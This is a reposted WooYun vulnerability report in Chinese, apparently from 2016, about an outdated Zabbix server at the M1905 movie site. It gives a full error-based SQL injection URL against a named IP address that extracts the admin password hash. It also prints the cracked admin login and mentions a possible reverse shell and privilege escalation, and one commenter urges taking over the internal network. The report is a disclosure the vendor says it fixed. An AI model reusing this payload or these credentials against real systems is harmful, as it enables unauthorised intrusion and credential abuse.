M1905电影网某站zabbix注入进后台命令执行

admin

139598
文章

114
评论

2017年5月7日15:57:40评论1,852 views字数 1426阅读4分45秒阅读模式

摘要

2016-03-14：细节已通知厂商并且等待厂商处理中
2016-03-15：厂商已经确认，细节仅向厂商公开
2016-03-15：厂商已经修复漏洞并主动公开，细节向公众公开

漏洞概要关注数(28) 关注此漏洞

缺陷编号： WooYun-2016-184717

漏洞标题： M1905电影网某站zabbix注入进后台命令执行

漏洞作者： ShAdow丶

提交时间： 2016-03-14 23:57

修复时间： 2016-03-15 16:43

公开时间： 2016-03-15 16:43

漏洞类型：命令执行

危害等级：高

自评Rank： 15

漏洞状态：厂商已经修复

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

14人收藏

漏洞详情

披露状态：

2016-03-14：细节已通知厂商并且等待厂商处理中
2016-03-15：厂商已经确认，细节仅向厂商公开
2016-03-15：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

详细说明：

code 区域

http://118.145.26.196/zabbix/index.php

登录处看zabbix版本太低了，记得以前有个前台注入的洞，于是用exp打了下。

http://118.145.26.196/zabbix/httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

解密后登录成功 admin/M1905&2014 由图可以看出是电影网的叮叮。

zabbix权限。

漏洞证明：

有内网ip

可以做反弹提权，继续深入。看了下内核版本没找到exp，就不继续了。。。

修复方案：

升级zabbix，版本太低了，还好权限控制得比较死

版权声明：转载请注明来源 ShAdow丶@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2016-03-15 13:59

厂商回复：

感谢提供信息

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-15 12:08 | 镱鍚 ( 普通白帽子 | Rank:302 漏洞数:42 | 执手岁月留香，唱曲往事飞扬...)

2

前排

1#回复此人
2016-03-15 17:05 | 1c3z ( 普通白帽子 | Rank:307 漏洞数:64 | @)!^)

1

好快。

2#回复此人
2016-03-15 17:35 | 无敌情痴 ( 普通白帽子 | Rank:203 漏洞数:61 | 没有站在安全界顶点的能力，但是也要不断的...)

2

路过

3#回复此人
2016-03-15 19:52 | jg_fly ( 路人 | Rank:4 漏洞数:2 | 技术宅爱电影爱阅读爱生活)

1

好抠门啊

4#回复此人
2016-03-15 21:44 | ShAdow丶 ( 普通白帽子 | Rank:119 漏洞数:19 )

1

厂商就不能多给点rank 虽然没深入 -。-

5#回复此人
2016-03-15 21:57 | Bloodwolf ( 实习白帽子 | Rank:47 漏洞数:8 | whoami)

2

你要一插到底！直接控内网，他们就给分了！然后你去喝点茶！

6#回复此人

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

漏洞概要 关注数(28) 关注此漏洞